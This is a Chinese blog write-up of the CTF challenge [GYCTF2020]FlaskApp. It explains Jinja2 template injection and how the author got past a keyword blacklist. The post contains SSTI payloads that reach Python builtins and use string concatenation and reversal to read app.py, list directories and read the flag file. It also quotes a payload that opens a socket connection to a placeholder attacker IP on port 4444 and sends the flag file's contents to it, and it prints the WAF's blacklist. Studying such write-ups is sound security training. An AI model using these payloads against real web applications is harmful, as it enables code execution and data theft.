[GYCTF2020]FlaskApp

最新推荐文章于 2024-07-30 20:28:19 发布
最新推荐文章于 2024-07-30 20:28:19 发布
阅读量228 收藏
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61209261/article/details/125985143
版权

考点

        flask的ssti模板注入

        ssti模板注入绕过        

        ping码的生成

信息收集

开局给了加密解密和提示 提示让我们努力尝试(好像没有用

然后在解密那乱输入发现debug开启了

然后就看见了部分源码

大概就是text参数绕过waf就可以执行代码了

用{{6+6}}加密解密得到12确定存在ssti模板注入

 

参考知识

        在jinja2中 控制结构 {% %} 变量取值 {{ }}

        python魔法方法与属性

                __class__                 返回调用的参数类型

                __bases__               返回基类列表

                __mro__                   此属性是在方法解析期间寻找基类时的参考类元组

                __subclasses__()     返回字典的列表

                __globals__              以字典的形式返回函数所在的全局命名空间所定义的全局变量与func_globals等价

                __builtins__              内建模块的引用,在任何地方都是可见的(包括全局),每个Python脚本都会自动加载,这个模块包括了很多强大的built-in函数,例如eval,exec,open等等

具体过程      

        先读完整的app.py方便绕过waf

        参考Templates Injections的payload

{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}
{%endif%}{% endfor %}

        改成

{% for x in [].__class__.__base__.__subclasses__() %}
{% if x.__name__=='catch_warnings' %}
{{ x.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}{% endfor %}

 换成一行

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('app.py').read() }}{% endif %}{% endfor %}

 得到一坨

 

 waf

def waf(str): 
    black_list = [&
    #34;flag","os","system",&
    #34;popen","import","eval",&
    #34;chr","request", "subprocess",&
    #34;commands","socket","hex",&
    #34;base64","*","?"
] 
    for x in black_list :
        if x in str.lower() : return 1@app.route('/hint',methods=['GET'])

 知道了些关键字另外还会将字符转小写,所以不能用lower或者base64、hex绕过,但可以字符串拼接绕过 用listdir方法查看当前目录文件

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

得到

['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']

看见this_is_the_flag.txt 再拼接用open读取

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt').read()}}{% endif %}{% endfor %}

 就来咯

 倒叙输出绕过

        txt.galf_eht_si_siht/’[::-1] 将字符倒转输出

        就是this_is_the_flag.txt  

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{ x.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1]).read()}}{% endif %}{% endfor %}

 利用PIN码进行RCE

这个我还没做出来 先留着 有点小问题在计算pin码上

好了开摆

 

 

 

怪小生失了神
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 346
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是FlaskFlask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 810
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1243
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
CTF赛题分析之 Flask 目录穿越
baimao__Ch的博客
04-25 663
最近身边有萌新想打ctf,我作为一个曾经接触过一点点ctf的业余菜鸡,就索性做了一道Web题。这篇文章主要是面向想开始打ctf的萌新,所以很多地方可能都比较简单。如有错误之处,欢迎各位指正。Flask库是一个非常小型的Python Web开发框架。它有两个主要依赖:路由、调试和 Web 服务器网关接口(Web Server Gateway Interface,WSGI)子系统由 Werkzeug(werkzeug.pocoo.org/)提供;模板系统由Jinja2(jinja.pocoo.org/)提供。
GYCTF2020 FlaskApp
汗的博客
09-04 1703
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
BUUCTF:[GYCTF2020]FlaskApp
末初的CSDN博客
09-19 1280
BUUCTF:[GYCTF2020]FlaskApp Writeup
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4291
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
LiteLLM
编码时光
07-25 1051
一、关于 LiteLLM🚅 企业级 我们为什么要建造这个? 二、用法 异步 流 日志可观测性 三、OpenAI代理 📖代理端点 快速启动代理-CLI 第1步:启动litellm代理 第2步:向代理发出ChatCompletions请求 代理密钥管理 请求 预期反应 四、支持的 Providers 五、贡献
基于flask的天气数据可视化系统1.0
lyccomcn的博客
07-25 291
Flask是一个基于Python的Web开发框架,它以灵活、微框架著称,基于werkzeug的轻量级web框架,可提高web应用的开发效率。首先,需要实例化一个Flask对象,然后设置一个路由,路由就是处理url到Python函数之间关系的程序,在Flask框架中通过@app.route装饰器来表示。也就是说,客户端将请求发送给web服务器,web服务器再将请求发送给Flask程序示例,程序示例需要知道每个url请求要运行哪些代码,所以需要建立一个url到python函数的映射。
Python】pandas:排序、重复值、缺省值处理、合并、分组
yannan20190313的博客
07-30 868
Python】pandas:排序(sort_index,sort_values,nsmallest,nlargest)、重复值(duplicated,drop_duplicates,value_counts,nunique)、缺省值处理(isna,isnull,notna,notnull,fillna,dropna,replace)、合并(join,merge,append,concat)、分组(groupby)
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 1007
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1103
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
Chapter 18 Python异常
2302_80253507的博客
07-28 1238
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
loguru日志模块:简化Python自动化测试的日志管理!
07-29 771
日志是软件开发中的关键组成部分,为开发和测试人员提供了调试和监控应用程序的重要手段。loguru 是一个第三方的 Python 日志库,以其简洁的 API 和自动化的功能脱颖而出。本文将探讨为什么项目中需要日志,loguru 为何受到青睐,以及如何封装和在接口自动化测试项目中使用 loguru,同时结合 Allure 生成丰富的测试报告。
Python面试题:如何使用WebSocket实现实时Web应用
最新发布
bigorsmallorlarge的专栏
07-30 339
通过上述步骤,你可以使用 Django Channels 和 WebSocket 创建一个简单的实时 Web 应用。Django Channels 提供了强大的功能,使得在 Django 中实现实时功能变得更加容易。你可以在此基础上扩展,添加更多功能和复杂的逻辑。
安卓手机部署大模型实战
奇舞周刊
07-25 1181
本文作者系360奇舞团前端开发工程师前言自ChatGPT发布以来,大语言模型(Large language model, LLM)就成了AI乃至整个计算机科学的话题中心。学术界,工业界围绕大语言模型本身及其应用展开了广泛的讨论,大量的新的实践层出不穷。由于LLM对计算资源的需求极大,有能力部署大语言模型的公司和实验室一般通过搭建集群,然后开放API或者网页demo的方式让用户可以使用模型。在人们纷...
Python入门知识点 10--闭包与装饰器
@网工小赵的博客
07-30 716
什么情况下会用到装饰器特性:在不修改源代码的基础上,给函数加功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值